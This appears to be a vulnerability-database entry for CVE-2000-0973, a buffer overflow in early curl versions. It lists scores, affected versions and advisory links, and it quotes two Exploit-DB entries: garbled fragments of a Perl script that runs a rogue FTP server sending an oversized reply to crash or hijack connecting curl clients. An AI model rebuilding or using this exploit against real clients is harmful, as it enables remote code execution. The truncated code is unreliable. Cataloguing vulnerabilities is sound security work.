CVE-2000-0973
published 2000-12-19CVE-2000-0973: Buffer overflow in curl earlier than 6.0-1.1, and curl-ssl earlier than 6.0-1.2, allows remote attackers to execute arbitrary commands by forcing a long error…
PriorityP346critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
19.25%
97.0th percentile
Buffer overflow in curl earlier than 6.0-1.1, and curl-ssl earlier than 6.0-1.2, allows remote attackers to execute arbitrary commands by forcing a long error message to be generated.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
| daniel_stenberg | curl | — | — |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4g26-v2fv-8g5f: Buffer overflow in curl earlier than 6
ghsa_unreviewed·2022-05-03
CVE-2000-0973 [HIGH] GHSA-4g26-v2fv-8g5f: Buffer overflow in curl earlier than 6
Buffer overflow in curl earlier than 6.0-1.1, and curl-ssl earlier than 6.0-1.2, allows remote attackers to execute arbitrary commands by forcing a long error message to be generated.
Red Hat
security flaw
vendor_redhat·2000-10-13·CVSS 10.0
CVE-2000-0973 [CRITICAL] security flaw
security flaw
Buffer overflow in curl earlier than 6.0-1.1, and curl-ssl earlier than 6.0-1.2, allows remote attackers to execute arbitrary commands by forcing a long error message to be generated.
No detection rules found.
Exploit-DB
cURL 6.1 < 7.4 - Remote Buffer Overflow (1)
exploitdb·2000-10-13
CVE-2000-0973 cURL 6.1 < 7.4 - Remote Buffer Overflow (1)
cURL 6.1 1024 && $id != 0) {
print
Option: $0 -o
Note: low ports require root privileges
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
TWENTE
exit;
}
for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;
}
Exploit-DB
cURL 6.1 < 7.4 - Remote Buffer Overflow (2)
exploitdb·2000-10-13
CVE-2000-0973 cURL 6.1 < 7.4 - Remote Buffer Overflow (2)
cURL 6.1 1024 && $id != 0) {
print
Option: $0 -o
Note: low ports require root privileges
TWENTE
exit;
}
for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $hostinfo->name || $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;
}
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:72.curl.aschttp://archives.neohapsis.com/archives/bugtraq/2000-10/0331.htmlhttp://www.securityfocus.com/bid/1804https://exchange.xforce.ibmcloud.com/vulnerabilities/5374ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:72.curl.aschttp://archives.neohapsis.com/archives/bugtraq/2000-10/0331.htmlhttp://www.securityfocus.com/bid/1804https://exchange.xforce.ibmcloud.com/vulnerabilities/5374
2000-12-19
Published